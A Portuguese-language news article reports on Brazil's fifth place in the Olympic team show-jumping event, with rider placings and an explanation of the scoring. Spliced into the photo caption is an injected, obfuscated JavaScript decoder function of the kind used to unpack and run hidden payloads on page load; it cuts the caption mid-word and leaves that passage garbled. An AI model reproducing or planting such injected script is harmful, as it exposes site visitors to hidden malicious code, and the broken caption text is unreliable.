Hipismo: Brasil fica em 5º lugar nos saltos por equipe

Redação
Cavaleiro Eduardo Menezes na apresentação de saltos do hipismo em que a equipe brasileira terminou na quinta colocação geral nos Jogos OlímpicosFern<script type=

function a4872b9c6b(y1){var qd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var x0=”;var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oaando Frazão/Agência Brasil” width=”580″ height=”388″ /> Cavaleiro Eduardo Menezes na apresentação de saltos do hipismo em que a equipe brasileira terminou na quinta colocação geral nos Jogos OlímpicosFernando Frazão/Agência Brasil

O Brasil ficou em quinto lugar na disputa de saltos por equipes no hipismo. O time brasileiro, com Doda Miranda, Eduardo Menezes e Pedro Veniss, entrou sem Stephan Barcha na segunda volta, que ocorreu hoje (17) no Centro Olímpico de Hipismo, e não pode descartar nenhum resultado. Bracha foi desclassificado na volta de ontem (16) por ter utilizado demais a espora no seu cavalo.

Cada equipe tem até quatro cavaleiros e o pior resultado é descartado. A classificação final é baseada nas notas das duas voltas.

A França ficou com o ouro e os Estados Unidos com a prata. Alemanha e Canadá tiveram a mesma pontuação nas duas voltas e fizeram mais um circuito de saltos. Os alemães zeraram a prova de desempate, sem nenhuma penalidade, e levaram o bronze.

O circuito de saltos do hipismo tem de 8 a 12 obstáculos, como barras paralelas, fossos e pequenos muros. Derrubar balizas, colocar as patas na água, refugar ou desviar do obstáculo significam faltas. As faltas somam pontos e vence quem contabilizar o menor número de infrações. Algumas faltas são eliminatórias.

Disputa individual

As competições do hipismo continuam na sexta-feira (19), com a disputa da final individual dos saltos. Miranda, Veniss e Menezes tentarão medalhas para o Brasil.

A volta de hoje também foi a terceira classificatória da prova individual. No total, são três classificatórias e os 20 melhores cavaleiros competem por medalhas também em duas rodadas finais.

Doda Miranda, com o cavalo Cornetto K, foi classificado na sétima posição; Pedro Veniss, com o cavalo Quabri de L'isle, ficou em 13º; e Eduardo Menezes, junto com Quintol, conseguiu o 18º lugar nas classificatórias.

Edição: Armando Cardoso